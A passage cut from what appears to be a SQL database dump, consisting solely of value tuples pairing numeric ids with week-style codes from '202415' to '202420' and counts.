2989,1,'202415',1),(2993,1,'202415',1),(3004,1,'202415',1),(3030,1,'202415',1),(3041,1,'202415',1),(3045,1,'202415',1),(3072,1,'202415',1),(3117,1,'202415',1),(3229,1,'202415',1),(3243,1,'202415',1),(3249,1,'202415',1),(3253,1,'202415',1),(3257,1,'202415',1),(3259,1,'202415',1),(3267,1,'202415',1),(3297,1,'202415',1),(3307,1,'202415',1),(3489,1,'202415',1),(3714,1,'202415',1),(3727,1,'202415',1),(3738,1,'202415',1),(4332,1,'202415',1),(4377,1,'202415',1),(4400,1,'202415',1),(4424,1,'202415',1),(4436,1,'202415',1),(4440,1,'202415',1),(4448,1,'202415',1),(4520,1,'202415',1),(4542,1,'202415',1),(4551,1,'202415',1),(4608,1,'202415',1),(4668,1,'202415',1),(4677,1,'202415',1),(4681,1,'202415',1),(4688,1,'202415',1),(4747,1,'202415',1),(4753,1,'202415',1),(4762,1,'202415',1),(4771,1,'202415',1),(4797,1,'202415',1),(4977,1,'202415',1),(4980,1,'202415',1),(4996,1,'202415',1),(5024,1,'202415',1),(5080,1,'202415',1),(5137,1,'202415',1),(5157,1,'202415',1),(5248,1,'202415',1),(5259,1,'202415',1),(5268,1,'202415',1),(5295,1,'202415',1),(5301,1,'202415',1),(5304,1,'202415',1),(5310,1,'202415',1),(5359,1,'202415',1),(5363,1,'202415',1),(5378,1,'202415',1),(91,1,'202415',2),(471,1,'202415',2),(1594,1,'202415',2),(1606,1,'202415',2),(1711,1,'202415',2),(1732,1,'202415',2),(1766,1,'202415',2),(1776,1,'202415',2),(2152,1,'202415',2),(2154,1,'202415',2),(2704,1,'202415',2),(3096,1,'202415',2),(3226,1,'202415',2),(3261,1,'202415',2),(3482,1,'202415',2),(3531,1,'202415',2),(3534,1,'202415',2),(3710,1,'202415',2),(3731,1,'202415',2),(3735,1,'202415',2),(3764,1,'202415',2),(4323,1,'202415',2),(4412,1,'202415',2),(4416,1,'202415',2),(4420,1,'202415',2),(4444,1,'202415',2),(4651,1,'202415',2),(4768,1,'202415',2),(4862,1,'202415',2),(4930,1,'202415',2),(5054,1,'202415',2),(5253,1,'202415',2),(74,1,'202415',3),(470,1,'202415',3),(476,1,'202415',3),(570,1,'202415',3),(1598,1,'202415',3),(1745,1,'202415',3),(1770,1,'202415',3),(2297,1,'202415',3),(2609,1,'202415',3),(3005,1,'202415',3),(3060,1,'202415',3),(3090,1,'202415',3),(3245,1,'202415',3),(3282,1,'202415',3),(4457,1,'202415',3),(4776,1,'202415',3),(4866,1,'202415',3),(4983,1,'202415',3),(1600,1,'202415',4),(1709,1,'202415',4),(1743,1,'202415',4),(1749,1,'202415',4),(2309,1,'202415',4),(2904,1,'202415',4),(3006,1,'202415',4),(3097,1,'202415',4),(3290,1,'202415',4),(4363,1,'202415',4),(5067,1,'202415',4),(5076,1,'202415',4),(5256,1,'202415',4),(1614,1,'202415',5),(2165,1,'202415',5),(3023,1,'202415',5),(5062,1,'202415',5),(1544,1,'202415',6),(1724,1,'202415',6),(5163,1,'202415',6),(5289,1,'202415',6),(1582,1,'202415',7),(3771,1,'202415',7),(4301,1,'202415',7),(87,1,'202415',8),(2809,1,'202415',8),(3066,1,'202415',8),(3069,1,'202415',9),(3265,1,'202415',10),(3781,1,'202415',10),(5050,1,'202415',10),(68,1,'202415',12),(4517,1,'202415',12),(1586,1,'202415',13),(2148,1,'202415',13),(3247,1,'202415',15),(80,1,'202415',71),(9,1,'202415',9066),(76,1,'202416',1),(102,1,'202416',1),(110,1,'202416',1),(472,1,'202416',1),(476,1,'202416',1),(478,1,'202416',1),(479,1,'202416',1),(480,1,'202416',1),(481,1,'202416',1),(482,1,'202416',1),(484,1,'202416',1),(486,1,'202416',1),(488,1,'202416',1),(1584,1,'202416',1),(1588,1,'202416',1),(1590,1,'202416',1),(1592,1,'202416',1),(1608,1,'202416',1),(1610,1,'202416',1),(1614,1,'202416',1),(1695,1,'202416',1),(1697,1,'202416',1),(1701,1,'202416',1),(1703,1,'202416',1),(1705,1,'202416',1),(1707,1,'202416',1),(1711,1,'202416',1),(1713,1,'202416',1),(1715,1,'202416',1),(1718,1,'202416',1),(1724,1,'202416',1),(1726,1,'202416',1),(1730,1,'202416',1),(1732,1,'202416',1),(1734,1,'202416',1),(1737,1,'202416',1),(1745,1,'202416',1),(1747,1,'202416',1),(1751,1,'202416',1),(1766,1,'202416',1),(1768,1,'202416',1),(1774,1,'202416',1),(1778,1,'202416',1),(2150,1,'202416',1),(2152,1,'202416',1),(2156,1,'202416',1),(2178,1,'202416',1),(2252,1,'202416',1),(2293,1,'202416',1),(2296,1,'202416',1),(2609,1,'202416',1),(2617,1,'202416',1),(2704,1,'202416',1),(2775,1,'202416',1),(2809,1,'202416',1),(2813,1,'202416',1),(2956,1,'202416',1),(2964,1,'202416',1),(2965,1,'202416',1),(2991,1,'202416',1),(2993,1,'202416',1),(3004,1,'202416',1),(3023,1,'202416',1),(3038,1,'202416',1),(3041,1,'202416',1),(3045,1,'202416',1),(3063,1,'202416',1),(3072,1,'202416',1),(3083,1,'202416',1),(3087,1,'202416',1),(3092,1,'202416',1),(3096,1,'202416',1),(3102,1,'202416',1),(3109,1,'202416',1),(3117,1,'202416',1),(3124,1,'202416',1),(3127,1,'202416',1),(3229,1,'202416',1),(3240,1,'202416',1),(3243,1,'202416',1),(3245,1,'202416',1),(3249,1,'202416',1),(3261,1,'202416',1),(3263,1,'202416',1),(3269,1,'202416',1),(3271,1,'202416',1),(3273,1,'202416',1),(3275,1,'202416',1),(3278,1,'202416',1),(3280,1,'202416',1),(3285,1,'202416',1),(3287,1,'202416',1),(3297,1,'202416',1),(3307,1,'202416',1),(3313,1,'202416',1),(3438,1,'202416',1),(3479,1,'202416',1),(3482,1,'202416',1),(3486,1,'202416',1),(3498,1,'202416',1),(3531,1,'202416',1),(3541,1,'202416',1),(3710,1,'202416',1),(3714,1,'202416',1),(3721,1,'202416',1),(3724,1,'202416',1),(3731,1,'202416',1),(3738,1,'202416',1),(3742,1,'202416',1),(3746,1,'202416',1),(3752,1,'202416',1),(3771,1,'202416',1),(3774,1,'202416',1),(3777,1,'202416',1),(4238,1,'202416',1),(4275,1,'202416',1),(4323,1,'202416',1),(4326,1,'202416',1),(4329,1,'202416',1),(4332,1,'202416',1),(4341,1,'202416',1),(4377,1,'202416',1),(4382,1,'202416',1),(4387,1,'202416',1),(4391,1,'202416',1),(4396,1,'202416',1),(4400,1,'202416',1),(4408,1,'202416',1),(4412,1,'202416',1),(4420,1,'202416',1),(4424,1,'202416',1),(4428,1,'202416',1),(4432,1,'202416',1),(4436,1,'202416',1),(4440,1,'202416',1),(4444,1,'202416',1),(4448,1,'202416',1),(4454,1,'202416',1),(4514,1,'202416',1),(4520,1,'202416',1),(4524,1,'202416',1),(4546,1,'202416',1),(4556,1,'202416',1),(4566,1,'202416',1),(4587,1,'202416',1),(4591,1,'202416',1),(4612,1,'202416',1),(4648,1,'202416',1),(4651,1,'202416',1),(4657,1,'202416',1),(4660,1,'202416',1),(4663,1,'202416',1),(4668,1,'202416',1),(4681,1,'202416',1),(4688,1,'202416',1),(4691,1,'202416',1),(4694,1,'202416',1),(4703,1,'202416',1),(4709,1,'202416',1),(4712,1,'202416',1),(4722,1,'202416',1),(4744,1,'202416',1),(4747,1,'202416',1),(4750,1,'202416',1),(4753,1,'202416',1),(4797,1,'202416',1),(4858,1,'202416',1),(4862,1,'202416',1),(4870,1,'202416',1),(4878,1,'202416',1),(4883,1,'202416',1),(4888,1,'202416',1),(4893,1,'202416',1),(4897,1,'202416',1),(4977,1,'202416',1),(5024,1,'202416',1),(5028,1,'202416',1),(5033,1,'202416',1),(5037,1,'202416',1),(5054,1,'202416',1),(5058,1,'202416',1),(5071,1,'202416',1),(5101,1,'202416',1),(5128,1,'202416',1),(5140,1,'202416',1),(5253,1,'202416',1),(5259,1,'202416',1),(5264,1,'202416',1),(5268,1,'202416',1),(5271,1,'202416',1),(5276,1,'202416',1),(5280,1,'202416',1),(5289,1,'202416',1),(5292,1,'202416',1),(5295,1,'202416',1),(5298,1,'202416',1),(5301,1,'202416',1),(5307,1,'202416',1),(5310,1,'202416',1),(5314,1,'202416',1),(5317,1,'202416',1),(5320,1,'202416',1),(5330,1,'202416',1),(5334,1,'202416',1),(5353,1,'202416',1),(5356,1,'202416',1),(5363,1,'202416',1),(5374,1,'202416',1),(5378,1,'202416',1),(108,1,'202416',2),(467,1,'202416',2),(469,1,'202416',2),(470,1,'202416',2),(471,1,'202416',2),(473,1,'202416',2),(485,1,'202416',2),(570,1,'202416',2),(1598,1,'202416',2),(1699,1,'202416',2),(1739,1,'202416',2),(1741,1,'202416',2),(1743,1,'202416',2),(2063,1,'202416',2),(2154,1,'202416',2),(2248,1,'202416',2),(2297,1,'202416',2),(2457,1,'202416',2),(2558,1,'202416',2),(2751,1,'202416',2),(2769,1,'202416',2),(2911,1,'202416',2),(2989,1,'202416',2),(3006,1,'202416',2),(3027,1,'202416',2),(3030,1,'202416',2),(3034,1,'202416',2),(3104,1,'202416',2),(3107,1,'202416',2),(3226,1,'202416',2),(3257,1,'202416',2),(3259,1,'202416',2),(3282,1,'202416',2),(3290,1,'202416',2),(3316,1,'202416',2),(3749,1,'202416',2),(4335,1,'202416',2),(4357,1,'202416',2),(4368,1,'202416',2),(4373,1,'202416',2),(4416,1,'202416',2),(4457,1,'202416',2),(4542,1,'202416',2),(4551,1,'202416',2),(4582,1,'202416',2),(4608,1,'202416',2),(4677,1,'202416',2),(4697,1,'202416',2),(4741,1,'202416',2),(4756,1,'202416',2),(4762,1,'202416',2),(4776,1,'202416',2),(4802,1,'202416',2),(4874,1,'202416',2),(4976,1,'202416',2),(4980,1,'202416',2),(4983,1,'202416',2),(4988,1,'202416',2),(5046,1,'202416',2),(5076,1,'202416',2),(5131,1,'202416',2),(5137,1,'202416',2),(5157,1,'202416',2),(5248,1,'202416',2),(5304,1,'202416',2),(74,1,'202416',3),(477,1,'202416',3),(487,1,'202416',3),(1594,1,'202416',3),(1602,1,'202416',3),(1606,1,'202416',3),(1709,1,'202416',3),(1720,1,'202416',3),(1722,1,'202416',3),(1728,1,'202416',3),(1770,1,'202416',3),(1772,1,'202416',3),(1776,1,'202416',3),(1780,1,'202416',3),(1782,1,'202416',3),(2161,1,'202416',3),(2165,1,'202416',3),(2503,1,'202416',3),(2658,1,'202416',3),(3251,1,'202416',3),(3253,1,'202416',3),(3265,1,'202416',3),(3267,1,'202416',3),(3489,1,'202416',3),(3534,1,'202416',3),(3727,1,'202416',3),(3735,1,'202416',3),(3764,1,'202416',3),(4338,1,'202416',3),(4363,1,'202416',3),(4404,1,'202416',3),(4759,1,'202416',3),(4768,1,'202416',3),(4996,1,'202416',3),(5062,1,'202416',3),(5067,1,'202416',3),(5359,1,'202416',3),(1604,1,'202416',4),(2748,1,'202416',4),(2801,1,'202416',4),(3430,1,'202416',4),(3781,1,'202416',4),(4301,1,'202416',4),(4674,1,'202416',4),(4930,1,'202416',4),(5080,1,'202416',4),(5163,1,'202416',4),(72,1,'202416',5),(335,1,'202416',5),(468,1,'202416',5),(474,1,'202416',5),(2804,1,'202416',5),(2904,1,'202416',5),(3060,1,'202416',5),(3069,1,'202416',5),(3079,1,'202416',5),(3090,1,'202416',5),(4645,1,'202416',5),(4792,1,'202416',5),(5050,1,'202416',5),(5256,1,'202416',5),(87,1,'202416',6),(89,1,'202416',6),(91,1,'202416',6),(1544,1,'202416',6),(1596,1,'202416',6),(2309,1,'202416',6),(3097,1,'202416',6),(4529,1,'202416',6),(84,1,'202416',7),(1582,1,'202416',7),(1749,1,'202416',7),(4685,1,'202416',7),(1600,1,'202416',8),(3005,1,'202416',8),(4654,1,'202416',8),(5125,1,'202416',8),(4765,1,'202416',9),(4771,1,'202416',9),(4866,1,'202416',9),(1586,1,'202416',10),(68,1,'202416',11),(4517,1,'202416',12),(3066,1,'202416',13),(3247,1,'202416',15),(2148,1,'202416',16),(80,1,'202416',75),(9,1,'202416',10802),(74,1,'202417',1),(102,1,'202417',1),(108,1,'202417',1),(110,1,'202417',1),(467,1,'202417',1),(468,1,'202417',1),(469,1,'202417',1),(470,1,'202417',1),(478,1,'202417',1),(479,1,'202417',1),(482,1,'202417',1),(483,1,'202417',1),(484,1,'202417',1),(486,1,'202417',1),(487,1,'202417',1),(1584,1,'202417',1),(1588,1,'202417',1),(1590,1,'202417',1),(1594,1,'202417',1),(1600,1,'202417',1),(1612,1,'202417',1),(1695,1,'202417',1),(1697,1,'202417',1),(1699,1,'202417',1),(1701,1,'202417',1),(1703,1,'202417',1),(1705,1,'202417',1),(1707,1,'202417',1),(1709,1,'202417',1),(1713,1,'202417',1),(1715,1,'202417',1),(1720,1,'202417',1),(1722,1,'202417',1),(1726,1,'202417',1),(1728,1,'202417',1),(1730,1,'202417',1),(1732,1,'202417',1),(1734,1,'202417',1),(1739,1,'202417',1),(1741,1,'202417',1),(1745,1,'202417',1),(1747,1,'202417',1),(1751,1,'202417',1),(1768,1,'202417',1),(1772,1,'202417',1),(1774,1,'202417',1),(1776,1,'202417',1),(1778,1,'202417',1),(1782,1,'202417',1),(2150,1,'202417',1),(2154,1,'202417',1),(2156,1,'202417',1),(2178,1,'202417',1),(2248,1,'202417',1),(2252,1,'202417',1),(2297,1,'202417',1),(2457,1,'202417',1),(2658,1,'202417',1),(2748,1,'202417',1),(2775,1,'202417',1),(2801,1,'202417',1),(2804,1,'202417',1),(2911,1,'202417',1),(2956,1,'202417',1),(2964,1,'202417',1),(2989,1,'202417',1),(2991,1,'202417',1),(2993,1,'202417',1),(3006,1,'202417',1),(3030,1,'202417',1),(3034,1,'202417',1),(3038,1,'202417',1),(3045,1,'202417',1),(3063,1,'202417',1),(3066,1,'202417',1),(3072,1,'202417',1),(3079,1,'202417',1),(3083,1,'202417',1),(3087,1,'202417',1),(3090,1,'202417',1),(3092,1,'202417',1),(3096,1,'202417',1),(3097,1,'202417',1),(3104,1,'202417',1),(3107,1,'202417',1),(3109,1,'202417',1),(3127,1,'202417',1),(3226,1,'202417',1),(3229,1,'202417',1),(3240,1,'202417',1),(3243,1,'202417',1),(3251,1,'202417',1),(3259,1,'202417',1),(3261,1,'202417',1),(3263,1,'202417',1),(3265,1,'202417',1),(3267,1,'202417',1),(3271,1,'202417',1),(3273,1,'202417',1),(3275,1,'202417',1),(3278,1,'202417',1),(3280,1,'202417',1),(3282,1,'202417',1),(3285,1,'202417',1),(3287,1,'202417',1),(3290,1,'202417',1),(3297,1,'202417',1),(3313,1,'202417',1),(3316,1,'202417',1),(3430,1,'202417',1),(3438,1,'202417',1),(3482,1,'202417',1),(3486,1,'202417',1),(3489,1,'202417',1),(3531,1,'202417',1),(3534,1,'202417',1),(3541,1,'202417',1),(3710,1,'202417',1),(3714,1,'202417',1),(3721,1,'202417',1),(3724,1,'202417',1),(3731,1,'202417',1),(3735,1,'202417',1),(3738,1,'202417',1),(3742,1,'202417',1),(3746,1,'202417',1),(3749,1,'202417',1),(3752,1,'202417',1),(3777,1,'202417',1),(4238,1,'202417',1),(4275,1,'202417',1),(4323,1,'202417',1),(4326,1,'202417',1),(4332,1,'202417',1),(4335,1,'202417',1),(4338,1,'202417',1),(4341,1,'202417',1),(4357,1,'202417',1),(4368,1,'202417',1),(4373,1,'202417',1),(4377,1,'202417',1),(4382,1,'202417',1),(4396,1,'202417',1),(4404,1,'202417',1),(4424,1,'202417',1),(4428,1,'202417',1),(4432,1,'202417',1),(4436,1,'202417',1),(4440,1,'202417',1),(4444,1,'202417',1),(4448,1,'202417',1),(4454,1,'202417',1),(4514,1,'202417',1),(4517,1,'202417',1),(4524,1,'202417',1),(4529,1,'202417',1),(4546,1,'202417',1),(4566,1,'202417',1),(4582,1,'202417',1),(4587,1,'202417',1),(4591,1,'202417',1),(4608,1,'202417',1),(4612,1,'202417',1),(4648,1,'202417',1),(4651,1,'202417',1),(4657,1,'202417',1),(4660,1,'202417',1),(4663,1,'202417',1),(4668,1,'202417',1),(4681,1,'202417',1),(4688,1,'202417',1),(4691,1,'202417',1),(4694,1,'202417',1),(4709,1,'202417',1),(4712,1,'202417',1),(4722,1,'202417',1),(4741,1,'202417',1),(4747,1,'202417',1),(4750,1,'202417',1),(4753,1,'202417',1),(4756,1,'202417',1),(4792,1,'202417',1),(4797,1,'202417',1),(4858,1,'202417',1),(4870,1,'202417',1),(4874,1,'202417',1),(4878,1,'202417',1),(4888,1,'202417',1),(4893,1,'202417',1),(4897,1,'202417',1),(4976,1,'202417',1),(4980,1,'202417',1),(4988,1,'202417',1),(5020,1,'202417',1),(5028,1,'202417',1),(5033,1,'202417',1),(5037,1,'202417',1),(5042,1,'202417',1),(5054,1,'202417',1),(5058,1,'202417',1),(5062,1,'202417',1),(5067,1,'202417',1),(5071,1,'202417',1),(5080,1,'202417',1),(5101,1,'202417',1),(5122,1,'202417',1),(5125,1,'202417',1),(5131,1,'202417',1),(5134,1,'202417',1),(5140,1,'202417',1),(5153,1,'202417',1),(5157,1,'202417',1),(5248,1,'202417',1),(5256,1,'202417',1),(5259,1,'202417',1),(5264,1,'202417',1),(5268,1,'202417',1),(5276,1,'202417',1),(5280,1,'202417',1),(5292,1,'202417',1),(5298,1,'202417',1),(5301,1,'202417',1),(5307,1,'202417',1),(5310,1,'202417',1),(5314,1,'202417',1),(5317,1,'202417',1),(5320,1,'202417',1),(5323,1,'202417',1),(5326,1,'202417',1),(5330,1,'202417',1),(5334,1,'202417',1),(5353,1,'202417',1),(5359,1,'202417',1),(5363,1,'202417',1),(5383,1,'202417',1),(91,1,'202417',2),(335,1,'202417',2),(472,1,'202417',2),(473,1,'202417',2),(477,1,'202417',2),(480,1,'202417',2),(481,1,'202417',2),(485,1,'202417',2),(488,1,'202417',2),(570,1,'202417',2),(1592,1,'202417',2),(1604,1,'202417',2),(1614,1,'202417',2),(1711,1,'202417',2),(1718,1,'202417',2),(1737,1,'202417',2),(1780,1,'202417',2),(2063,1,'202417',2),(2159,1,'202417',2),(2161,1,'202417',2),(2165,1,'202417',2),(2503,1,'202417',2),(2617,1,'202417',2),(2704,1,'202417',2),(2751,1,'202417',2),(2769,1,'202417',2),(3004,1,'202417',2),(3027,1,'202417',2),(3245,1,'202417',2),(3249,1,'202417',2),(3253,1,'202417',2),(3257,1,'202417',2),(3269,1,'202417',2),(3479,1,'202417',2),(3727,1,'202417',2),(3774,1,'202417',2),(4329,1,'202417',2),(4363,1,'202417',2),(4391,1,'202417',2),(4412,1,'202417',2),(4520,1,'202417',2),(4542,1,'202417',2),(4697,1,'202417',2),(4700,1,'202417',2),(4706,1,'202417',2),(4744,1,'202417',2),(4768,1,'202417',2),(4771,1,'202417',2),(4776,1,'202417',2),(4862,1,'202417',2),(4883,1,'202417',2),(4930,1,'202417',2),(4977,1,'202417',2),(4983,1,'202417',2),(5046,1,'202417',2),(5050,1,'202417',2),(5128,1,'202417',2),(5137,1,'202417',2),(5146,1,'202417',2),(5295,1,'202417',2),(5356,1,'202417',2),(5374,1,'202417',2),(5378,1,'202417',2),(84,1,'202417',3),(471,1,'202417',3),(474,1,'202417',3),(1596,1,'202417',3),(1602,1,'202417',3),(1606,1,'202417',3),(1608,1,'202417',3),(1610,1,'202417',3),(1724,1,'202417',3),(1743,1,'202417',3),(1770,1,'202417',3),(2152,1,'202417',3),(2309,1,'202417',3),(2558,1,'202417',3),(2813,1,'202417',3),(3005,1,'202417',3),(3023,1,'202417',3),(3060,1,'202417',3),(3102,1,'202417',3),(3117,1,'202417',3),(3498,1,'202417',3),(4301,1,'202417',3),(4400,1,'202417',3),(4408,1,'202417',3),(4685,1,'202417',3),(4703,1,'202417',3),(4759,1,'202417',3),(4762,1,'202417',3),(4802,1,'202417',3),(4996,1,'202417',3),(5024,1,'202417',3),(5304,1,'202417',3),(76,1,'202417',4),(476,1,'202417',4),(1544,1,'202417',4),(1598,1,'202417',4),(2809,1,'202417',4),(2965,1,'202417',4),(3041,1,'202417',4),(3069,1,'202417',4),(3124,1,'202417',4),(3307,1,'202417',4),(3764,1,'202417',4),(4420,1,'202417',4),(4551,1,'202417',4),(4645,1,'202417',4),(4654,1,'202417',4),(1749,1,'202417',5),(2609,1,'202417',5),(4677,1,'202417',5),(4866,1,'202417',5),(5076,1,'202417',5),(89,1,'202417',6),(1766,1,'202417',6),(2904,1,'202417',6),(4457,1,'202417',6),(4765,1,'202417',6),(72,1,'202417',7),(87,1,'202417',7),(3771,1,'202417',7),(4387,1,'202417',7),(4416,1,'202417',7),(4556,1,'202417',7),(5253,1,'202417',7),(5271,1,'202417',7),(5289,1,'202417',7),(3781,1,'202417',8),(4674,1,'202417',8),(5163,1,'202417',8),(68,1,'202417',9),(2148,1,'202417',11),(1582,1,'202417',16),(1586,1,'202417',17),(3247,1,'202417',17),(80,1,'202417',72),(9,1,'202417',9161),(74,1,'202418',1),(91,1,'202418',1),(102,1,'202418',1),(469,1,'202418',1),(470,1,'202418',1),(473,1,'202418',1),(477,1,'202418',1),(481,1,'202418',1),(482,1,'202418',1),(485,1,'202418',1),(570,1,'202418',1),(1592,1,'202418',1),(1594,1,'202418',1),(1600,1,'202418',1),(1606,1,'202418',1),(1610,1,'202418',1),(1612,1,'202418',1),(1614,1,'202418',1),(1699,1,'202418',1),(1701,1,'202418',1),(1707,1,'202418',1),(1734,1,'202418',1),(1741,1,'202418',1),(1747,1,'202418',1),(2154,1,'202418',1),(2159,1,'202418',1),(2165,1,'202418',1),(2178,1,'202418',1),(2248,1,'202418',1),(2457,1,'202418',1),(2609,1,'202418',1),(2748,1,'202418',1),(2775,1,'202418',1),(2804,1,'202418',1),(2813,1,'202418',1),(3063,1,'202418',1),(3066,1,'202418',1),(3069,1,'202418',1),(3107,1,'202418',1),(3253,1,'202418',1),(3290,1,'202418',1),(3297,1,'202418',1),(3307,1,'202418',1),(3727,1,'202418',1),(3746,1,'202418',1),(3752,1,'202418',1),(4323,1,'202418',1),(4329,1,'202418',1),(4404,1,'202418',1),(4412,1,'202418',1),(4436,1,'202418',1),(4448,1,'202418',1),(4542,1,'202418',1),(4582,1,'202418',1),(4648,1,'202418',1),(4660,1,'202418',1),(4697,1,'202418',1),(4703,1,'202418',1),(4709,1,'202418',1),(4722,1,'202418',1),(4756,1,'202418',1),(4792,1,'202418',1),(4802,1,'202418',1),(4858,1,'202418',1),(4883,1,'202418',1),(4897,1,'202418',1),(4930,1,'202418',1),(4976,1,'202418',1),(4988,1,'202418',1),(4996,1,'202418',1),(5050,1,'202418',1),(5071,1,'202418',1),(5134,1,'202418',1),(5140,1,'202418',1),(5163,1,'202418',1),(5248,1,'202418',1),(5253,1,'202418',1),(5259,1,'202418',1),(5264,1,'202418',1),(5314,1,'202418',1),(5353,1,'202418',1),(5378,1,'202418',1),(72,1,'202418',2),(110,1,'202418',2),(468,1,'202418',2),(471,1,'202418',2),(474,1,'202418',2),(479,1,'202418',2),(1608,1,'202418',2),(1724,1,'202418',2),(1726,1,'202418',2),(1728,1,'202418',2),(1745,1,'202418',2),(1776,1,'202418',2),(1782,1,'202418',2),(2156,1,'202418',2),(2309,1,'202418',2),(2558,1,'202418',2),(2991,1,'202418',2),(2993,1,'202418',2),(3117,1,'202418',2),(3124,1,'202418',2),(3240,1,'202418',2),(3245,1,'202418',2),(3249,1,'202418',2),(3271,1,'202418',2),(3282,1,'202418',2),(3430,1,'202418',2),(3438,1,'202418',2),(3714,1,'202418',2),(4396,1,'202418',2),(4416,1,'202418',2),(4457,1,'202418',2),(4551,1,'202418',2),(4645,1,'202418',2),(4674,1,'202418',2),(4681,1,'202418',2),(4759,1,'202418',2),(4762,1,'202418',2),(4866,1,'202418',2),(4893,1,'202418',2),(4983,1,'202418',2),(5101,1,'202418',2),(5280,1,'202418',2),(5295,1,'202418',2),(5317,1,'202418',2),(1590,1,'202418',3),(1766,1,'202418',3),(2904,1,'202418',3),(3023,1,'202418',3),(4520,1,'202418',3),(4529,1,'202418',3),(4546,1,'202418',3),(4677,1,'202418',3),(76,1,'202418',4),(467,1,'202418',4),(1602,1,'202418',4),(2751,1,'202418',4),(3004,1,'202418',4),(3030,1,'202418',4),(4663,1,'202418',4),(5076,1,'202418',4),(1544,1,'202418',5),(1743,1,'202418',5),(1749,1,'202418',5),(3764,1,'202418',5),(4862,1,'202418',5),(5080,1,'202418',5),(5268,1,'202418',5),(87,1,'202418',6),(1604,1,'202418',6),(89,1,'202418',7),(2809,1,'202418',8),(2148,1,'202418',9),(3060,1,'202418',10),(3781,1,'202418',10),(1582,1,'202418',12),(3247,1,'202418',12),(68,1,'202418',14),(1586,1,'202418',14),(80,1,'202418',49),(9,1,'202418',10285),(72,1,'202419',1),(84,1,'202419',1),(91,1,'202419',1),(335,1,'202419',1),(477,1,'202419',1),(570,1,'202419',1),(1584,1,'202419',1),(1610,1,'202419',1),(1614,1,'202419',1),(1718,1,'202419',1),(1728,1,'202419',1),(1732,1,'202419',1),(1737,1,'202419',1),(1766,1,'202419',1),(2063,1,'202419',1),(2150,1,'202419',1),(2156,1,'202419',1),(2609,1,'202419',1),(2704,1,'202419',1),(2775,1,'202419',1),(2911,1,'202419',1),(3005,1,'202419',1),(3006,1,'202419',1),(3034,1,'202419',1),(3063,1,'202419',1),(3096,1,'202419',1),(3124,1,'202419',1),(3240,1,'202419',1),(3245,1,'202419',1),(3253,1,'202419',1),(3257,1,'202419',1),(3265,1,'202419',1),(3489,1,'202419',1),(3498,1,'202419',1),(3724,1,'202419',1),(3738,1,'202419',1),(3752,1,'202419',1),(4301,1,'202419',1),(4329,1,'202419',1),(4368,1,'202419',1),(4391,1,'202419',1),(4416,1,'202419',1),(4529,1,'202419',1),(4556,1,'202419',1),(4582,1,'202419',1),(4645,1,'202419',1),(4668,1,'202419',1),(4685,1,'202419',1),(4709,1,'202419',1),(4722,1,'202419',1),(4765,1,'202419',1),(4980,1,'202419',1),(4996,1,'202419',1),(5024,1,'202419',1),(5128,1,'202419',1),(5146,1,'202419',1),(5314,1,'202419',1),(5353,1,'202419',1),(5356,1,'202419',1),(74,1,'202419',2),(472,1,'202419',2),(1604,1,'202419',2),(1608,1,'202419',2),(1701,1,'202419',2),(1724,1,'202419',2),(1743,1,'202419',2),(1780,1,'202419',2),(2152,1,'202419',2),(2457,1,'202419',2),(2503,1,'202419',2),(2751,1,'202419',2),(2809,1,'202419',2),(2904,1,'202419',2),(2956,1,'202419',2),(3023,1,'202419',2),(3045,1,'202419',2),(3259,1,'202419',2),(3479,1,'202419',2),(3541,1,'202419',2),(4323,1,'202419',2),(4412,1,'202419',2),(4420,1,'202419',2),(4744,1,'202419',2),(4776,1,'202419',2),(4802,1,'202419',2),(5067,1,'202419',2),(5076,1,'202419',2),(5134,1,'202419',2),(5259,1,'202419',2),(5264,1,'202419',2),(89,1,'202419',3),(1544,1,'202419',3),(1776,1,'202419',3),(4688,1,'202419',3),(4759,1,'202419',3),(1582,1,'202419',4),(1747,1,'202419',4),(1749,1,'202419',4),(3249,1,'202419',4),(5323,1,'202419',4),(2309,1,'202419',5),(3060,1,'202419',5),(3083,1,'202419',5),(4520,1,'202419',5),(4874,1,'202419',5),(5080,1,'202419',5),(87,1,'202419',6),(3781,1,'202419',6),(5292,1,'202419',6),(2813,1,'202419',7),(4771,1,'202419',7),(1586,1,'202419',8),(1602,1,'202419',9),(5125,1,'202419',9),(68,1,'202419',10),(1600,1,'202419',12),(2148,1,'202419',12),(3247,1,'202419',12),(80,1,'202419',41),(9,1,'202419',9241),(91,1,'202420',1),(102,1,'202420',1),(335,1,'202420',1),(467,1,'202420',1),(468,1,'202420',1),(469,1,'202420',1),(470,1,'202420',1),(471,1,'202420',1),(472,1,'202420',1),(474,1,'202420',1),(476,1,'202420',1),(477,1,'202420',1),(478,1,'202420',1),(479,1,'202420',1),(480,1,'202420',1),(481,1,'202420',1),(482,1,'202420',1),(483,1,'202420',1),(484,1,'202420',1),(485,1,'202420',1),(486,1,'202420',1),(487,1,'202420',1),(1584,1,'202420',1),(1588,1,'202420',1),(1592,1,'202420',1),(1594,1,'202420',1),(1602,1,'202420',1),(1604,1,'202420',1),(1606,1,'202420',1),(1610,1,'202420',1),(1695,1,'202420',1),(1703,1,'202420',1),(1705,1,'202420',1),(1707,1,'202420',1),(1713,1,'202420',1),(1715,1,'202420',1),(1718,1,'202420',1),(1720,1,'202420',1),(1724,1,'202420',1),(1726,1,'202420',1),(1728,1,'202420',1),(1730,1,'202420',1),(1732,1,'202420',1),(1734,1,'202420',1),(1737,1,'202420',1),(1739,1,'202420',1),(1741,1,'202420',1),(1743,1,'202420',1),(1745,1,'202420',1),(1751,1,'202420',1),(1766,1,'202420',1),(1770,1,'202420',1),(1772,1,'202420',1),(1774,1,'202420',1),(1776,1,'202420',1),(1778,1,'202420',1),(1782,1,'202420',1),(2063,1,'202420',1),(2150,1,'202420',1),(2154,1,'202420',1),(2156,1,'202420',1),(2159,1,'202420',1),(2161,1,'202420',1),(2178,1,'202420',1),(2252,1,'202420',1),(2293,1,'202420',1),(2296,1,'202420',1),(2297,1,'202420',1),(2503,1,'202420',1),(2558,1,'202420',1),(2617,1,'202420',1),(2658,1,'202420',1),(2704,1,'202420',1),(2748,1,'202420',1),(2769,1,'202420',1),(2804,1,'202420',1),(2809,1,'202420',1),(2813,1,'202420',1),(2911,1,'202420',1),(2956,1,'202420',1),(2964,1,'202420',1),(2989,1,'202420',1),(2991,1,'202420',1),(2993,1,'202420',1),(3005,1,'202420',1),(3006,1,'202420',1),(3027,1,'202420',1),(3030,1,'202420',1),(3034,1,'202420',1),(3038,1,'202420',1),(3066,1,'202420',1),(3072,1,'202420',1),(3079,1,'202420',1),(3092,1,'202420',1),(3096,1,'202420',1),(3097,1,'202420',1),(3102,1,'202420',1),(3104,